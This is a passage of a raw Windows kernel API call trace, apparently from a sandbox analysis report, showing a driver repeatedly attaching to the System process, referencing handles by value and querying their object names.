PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0259.003] ObReferenceObjectByHandle (in: Handle=0xffffffff80001374, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a2944a0, HandleInformation=0x0) returned 0x0 [0259.003] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0259.003] PsReleaseProcessExitSynchronization () returned 0x2 [0259.003] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f928 [0259.003] ObQueryNameString (in: Object=0xffffe0006a2944a0, ObjectNameInfo=0xffffe0006a3f8044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3f8044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0259.003] ObfDereferenceObject (Object=0xffffe0006a2944a0) returned 0x8000 [0259.003] IoCompleteRequest () returned 0x0 [0259.003] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0259.003] PsAcquireProcessExitSynchronization () returned 0x0 [0259.003] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0259.003] ObReferenceObjectByHandle (in: Handle=0xffffffff80001378, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a92e500, HandleInformation=0x0) returned 0x0 [0259.003] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0259.003] PsReleaseProcessExitSynchronization () returned 0x2 [0259.003] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f927 [0259.003] ObQueryNameString (in: Object=0xffffe0006a92e500, ObjectNameInfo=0xffffe0006a33d044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a33d044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0259.003] ObfDereferenceObject (Object=0xffffe0006a92e500) returned 0x8000 [0259.003] IoCompleteRequest () returned 0x0 [0259.003] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0259.003] PsAcquireProcessExitSynchronization () returned 0x0 [0259.003] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0259.003] ObReferenceObjectByHandle (in: Handle=0xffffffff8000137c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00068a6f620, HandleInformation=0x0) returned 0x0 [0259.003] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0259.003] PsReleaseProcessExitSynchronization () returned 0x2 [0259.003] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f926 [0259.003] ObQueryNameString (in: Object=0xffffe00068a6f620, ObjectNameInfo=0xffffe00068178044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068178044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0259.003] ObfDereferenceObject (Object=0xffffe00068a6f620) returned 0x8000 [0259.003] IoCompleteRequest () returned 0x0 [0259.003] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0259.003] PsAcquireProcessExitSynchronization () returned 0x0 [0259.003] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0259.003] ObReferenceObjectByHandle (in: Handle=0xffffffff800013a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a723780, HandleInformation=0x0) returned 0x0 [0259.003] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0259.003] PsReleaseProcessExitSynchronization () returned 0x2 [0259.003] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f925 [0259.003] ObQueryNameString (in: Object=0xffffe0006a723780, ObjectNameInfo=0xffffe00068a59684, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068a59684, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0259.003] ObfDereferenceObject (Object=0xffffe0006a723780) returned 0x8000 [0259.003] IoCompleteRequest () returned 0x0 [0259.003] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0259.003] PsAcquireProcessExitSynchronization () returned 0x0 [0259.003] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0259.003] ObReferenceObjectByHandle (in: Handle=0xffffffff800013a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a9001e0, HandleInformation=0x0) returned 0x0 [0259.003] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0259.003] PsReleaseProcessExitSynchronization () returned 0x2 [0259.003] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f924 [0259.003] ObQueryNameString (in: Object=0xffffe0006a9001e0, ObjectNameInfo=0xffffe0006a816044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a816044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0259.003] ObfDereferenceObject (Object=0xffffe0006a9001e0) returned 0x8000 [0259.003] IoCompleteRequest () returned 0x0 [0259.004] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0259.004] PsAcquireProcessExitSynchronization () returned 0x0 [0259.004] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0259.004] ObReferenceObjectByHandle (in: Handle=0xffffffff800013b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000691e7690, HandleInformation=0x0) returned 0x0 [0259.004] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0259.004] PsReleaseProcessExitSynchronization () returned 0x2 [0259.004] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f923 [0259.004] ObQueryNameString (in: Object=0xffffe000691e7690, ObjectNameInfo=0xffffe000684197c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000684197c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0259.004] ObfDereferenceObject (Object=0xffffe000691e7690) returned 0x8000 [0259.004] IoCompleteRequest () returned 0x0 [0259.004] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0259.004] PsAcquireProcessExitSynchronization () returned 0x0 [0259.004] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0259.004] ObReferenceObjectByHandle (in: Handle=0xffffffff800013c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0259.004] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0259.004] PsReleaseProcessExitSynchronization () returned 0x2 [0259.004] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f922 [0259.004] IoCompleteRequest () returned 0x0 [0259.004] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0259.004] PsAcquireProcessExitSynchronization () returned 0x0 [0259.004] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0259.004] ObReferenceObjectByHandle (in: Handle=0xffffffff800013e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0259.004] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0259.004] PsReleaseProcessExitSynchronization () returned 0x2 [0259.004] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f921 [0259.004] IoCompleteRequest () returned 0x0 [0259.004] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0259.004] PsAcquireProcessExitSynchronization () returned 0x0 [0259.004] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0259.004] ObReferenceObjectByHandle (in: Handle=0xffffffff800013ec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0259.004] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0259.004] PsReleaseProcessExitSynchronization () returned 0x2 [0259.004] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f920 [0259.004] IoCompleteRequest () returned 0x0 [0259.004] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0259.004] PsAcquireProcessExitSynchronization () returned 0x0 [0259.004] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0259.004] ObReferenceObjectByHandle (in: Handle=0xffffffff800013f0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0259.004] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0259.004] PsReleaseProcessExitSynchronization () returned 0x2 [0259.004] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f91f [0259.004] IoCompleteRequest () returned 0x0 [0259.004] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0259.004] PsAcquireProcessExitSynchronization () returned 0x0 [0259.004] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0259.004] ObReferenceObjectByHandle (in: Handle=0xffffffff800013f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a75b950, HandleInformation=0x0) returned 0x0 [0259.005] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0259.005] PsReleaseProcessExitSynchronization () returned 0x2 [0259.005] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f91e [0259.005] ObQueryNameString (in: Object=0xffffe0006a75b950, ObjectNameInfo=0xffffe0006a2a6044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a2a6044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0259.005] ObfDereferenceObject (Object=0xffffe0006a75b950) returned 0x8000 [0259.005] IoCompleteRequest () returned 0x0 [0259.005] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0259.005] PsAcquireProcessExitSynchronization () returned 0x0 [0259.005] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0259.005] ObReferenceObjectByHandle (in: Handle=0xffffffff800013fc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0259.005] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0259.005] PsReleaseProcessExitSynchronization () returned 0x2 [0259.005] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f91d [0259.005] IoCompleteRequest () returned 0x0 [0259.005] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0259.005] PsAcquireProcessExitSynchronization () returned 0x0 [0259.005] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0259.005] ObReferenceObjectByHandle (in: Handle=0xffffffff80001404, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0259.005] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0259.005] PsReleaseProcessExitSynchronization () returned 0x2 [0259.005] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f91c [0259.005] IoCompleteRequest () returned 0x0 [0259.005] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0259.005] PsAcquireProcessExitSynchronization () returned 0x0 [0259.005] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0259.005] ObReferenceObjectByHandle (in: Handle=0xffffffff8000140c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000691a95e0, HandleInformation=0x0) returned 0x0 [0259.005] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0259.005] PsReleaseProcessExitSynchronization () returned 0x2 [0259.005] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f91b [0259.005] ObQueryNameString (in: Object=0xffffe000691a95e0, ObjectNameInfo=0xffffe0006840f7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006840f7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0259.005] ObfDereferenceObject (Object=0xffffe000691a95e0) returned 0x8000 [0259.005] IoCompleteRequest () returned 0x0 [0259.005] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0259.005] PsAcquireProcessExitSynchronization () returned 0x0 [0259.005] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0259.005] ObReferenceObjectByHandle (in: Handle=0xffffffff80001410, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0259.005] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0259.005] PsReleaseProcessExitSynchronization () returned 0x2 [0259.005] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f91a [0259.005] IoCompleteRequest () returned 0x0 [0259.005] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0259.005] PsAcquireProcessExitSynchronization () returned 0x0 [0259.005] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0259.005] ObReferenceObjectByHandle (in: Handle=0xffffffff80001420, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0259.005] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0259.006] PsReleaseProcessExitSynchronization () returned 0x2 [0259.006] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f919 [0259.006] IoCompleteRequest () returned 0x0 [0259.006] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0259.006] PsAcquireProcessExitSynchronization () returned 0x0 [0259.006] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0259.006] ObReferenceObjectByHandle (in: Handle=0xffffffff80001424, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0259.006] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0259.006] PsReleaseProcessExitSynchronization () returned 0x2 [0259.006] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f918 [0259.006] IoCompleteRequest () returned 0x0 [0259.006] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0259.006] PsAcquireProcessExitSynchronization () returned 0x0 [0259.006] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0259.006] ObReferenceObjectByHandle (in: Handle=0xffffffff80001428, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0259.006] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0259.006] PsReleaseProcessExitSynchronization () returned 0x2 [0259.006] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f917 [0259.006] IoCompleteRequest () returned 0x0 [0259.006] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0259.006] PsAcquireProcessExitSynchronization () returned 0x0 [0259.006] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0259.006] ObReferenceObjectByHandle (in: Handle=0xffffffff80001430, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0259.006] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0259.006] PsReleaseProcessExitSynchronization () returned 0x2 [0259.006] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f916 [0259.006] IoCompleteRequest () returned 0x0 [0259.006] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0259.006] PsAcquireProcessExitSynchronization () returned 0x0 [0259.006] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0259.006] ObReferenceObjectByHandle (in: Handle=0xffffffff80001434, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0259.006] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0259.006] PsReleaseProcessExitSynchronization () returned 0x2 [0259.006] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f915 [0259.006] IoCompleteRequest () returned 0x0 [0259.006] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0259.006] PsAcquireProcessExitSynchronization () returned 0x0 [0259.006] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0259.006] ObReferenceObjectByHandle (in: Handle=0xffffffff80001438, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a660080, HandleInformation=0x0) returned 0x0 [0259.006] ObfDereferenceObject (Object=0xffffe0006a660080) returned 0x20005 [0259.006] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0259.006] PsReleaseProcessExitSynchronization () returned 0x2 [0259.006] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f914 [0259.006] IoCompleteRequest () returned 0x0 [0259.007] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0259.007] PsAcquireProcessExitSynchronization () returned 0x0 [0259.007] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0259.007] ObReferenceObjectByHandle (in: Handle=0xffffffff8000143c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc0014adb89b0, HandleInformation=0x0) returned 0x0 [0259.007] ObfDereferenceObject (Object=0xffffc0014adb89b0) returned 0x8000 [0259.007] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0259.007] PsReleaseProcessExitSynchronization () returned 0x2 [0259.007] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f913 [0259.007] IoCompleteRequest () returned 0x0 [0259.007] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0259.007] PsAcquireProcessExitSynchronization () returned 0x0 [0259.007] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0259.007] ObReferenceObjectByHandle (in: Handle=0xffffffff80001444, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0259.007] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0259.007] PsReleaseProcessExitSynchronization () returned 0x2 [0259.007] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f912 [0259.007] IoCompleteRequest () returned 0x0 [0259.007] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0259.007] PsAcquireProcessExitSynchronization () returned 0x0 [0259.007] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0259.007] ObReferenceObjectByHandle (in: Handle=0xffffffff80001448, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0259.007] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0259.007] PsReleaseProcessExitSynchronization () returned 0x2 [0259.007] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f911 [0259.007] IoCompleteRequest () returned 0x0 [0259.007] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0259.007] PsAcquireProcessExitSynchronization () returned 0x0 [0259.007] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0259.007] ObReferenceObjectByHandle (in: Handle=0xffffffff80001450, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0259.007] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0259.007] PsReleaseProcessExitSynchronization () returned 0x2 [0259.007] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f910 [0259.007] IoCompleteRequest () returned 0x0 [0259.007] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0259.007] PsAcquireProcessExitSynchronization () returned 0x0 [0259.007] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0259.007] ObReferenceObjectByHandle (in: Handle=0xffffffff80001454, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0259.007] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0259.007] PsReleaseProcessExitSynchronization () returned 0x2 [0259.007] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f90f [0259.007] IoCompleteRequest () returned 0x0 [0259.007] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0259.007] PsAcquireProcessExitSynchronization () returned 0x0 [0259.007] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0259.008] ObReferenceObjectByHandle (in: Handle=0xffffffff8000145c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0259.008] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0259.008] PsReleaseProcessExitSynchronization () returned 0x2 [0259.008] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f90e [0259.008] IoCompleteRequest () returned 0x0 [0259.008] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0259.008] PsAcquireProcessExitSynchronization () returned 0x0 [0259.008] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0259.008] ObReferenceObjectByHandle (in: Handle=0xffffffff80001460, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0259.008] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0259.008] PsReleaseProcessExitSynchronization () returned 0x2 [0259.008] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f90d [0259.008] IoCompleteRequest () returned 0x0 [0259.008] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0259.008] PsAcquireProcessExitSynchronization () returned 0x0 [0259.008] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0259.008] ObReferenceObjectByHandle (in: Handle=0xffffffff80001468, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0259.008] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0259.008] PsReleaseProcessExitSynchronization () returned 0x2 [0259.008] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f90c [0259.008] IoCompleteRequest () returned 0x0 [0259.008] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0259.008] 